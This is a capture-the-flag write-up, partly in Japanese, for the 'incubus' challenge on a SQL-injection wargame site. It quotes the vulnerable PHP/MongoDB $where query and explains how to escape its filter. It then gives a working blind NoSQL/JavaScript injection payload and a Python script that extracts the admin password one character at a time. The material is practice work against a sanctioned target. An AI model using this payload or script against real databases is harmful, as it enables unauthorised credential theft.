<?php
include "./config.php";
login_chk();
$db = mongodb_connect();
if(preg_match('/prob|_|\(/i', $_GET['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\(/i', $_GET['pw'])) exit("No Hack ~_~");
$query = array("\$where" => "function(){return obj.id=='{$_GET['id']}'&&obj.pw=='{$_GET['pw']}';}");
echo "<hr>query : <strong>".json_encode($query)."</strong><hr><br>";
$result = mongodb_fetch_array($db->prob_incubus->find($query));
if($result['id']) echo "<h2>Hello {$result['id']}</h2>";

$query = array("id" => "admin");
$result = mongodb_fetch_array($db->prob_incubus->find($query));
if($result['pw'] === $_GET['pw']) solve("incubus");
highlight_file(__FILE__);

特徴は以下。

MongoDB
id,pwが入力可能
- prob,_,(がフィルタリング
whereを使って持ってきている
adminのpwを特定する必要がある

Blind NoSQL Injection (for MongoDB) (SSJI?)

Blind NoSQL Injectionをやる。
というより、with SSJIかも。

MongoDBではJSで評価関数を使って持ってくるwhere構文がある。
開き括弧が使えないので、js関数は使えない。
配列をうまく使おう。

idにadmin' && obj.pw[0]=='a';'を入れればいい。
するとインジェクション後は

function(){
    return obj.id=='admin' && obj.pw[0]=='a';
    ''&&obj.pw=='';
}

となり、良い感じになる。

import requests

url = "https://los.rubiya.kr/chall/incubus_3d7.php"
cookie = {'PHPSESSID': 'q5'}

def check(data) -> bool:
    return ("Hello admin" in data) or ("Hello guest" in data) or ("<h2>Hello User</h2>" in data)
def make_query(ans, c, idx):
    return {'id': f"admin' && obj.pw[{idx-1}]=='{c}';'"}

ans = ""
for i in range(1, 1010):
    ok = False
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ,":
        res = requests.get(url, params=make_query(ans, c, i), cookies=cookie)
        if check(res.text):
            ans += c
            ok = True
            break
    if not ok:
        break
    print(f"[*] {ans}")
print(f"[*] find! {ans}")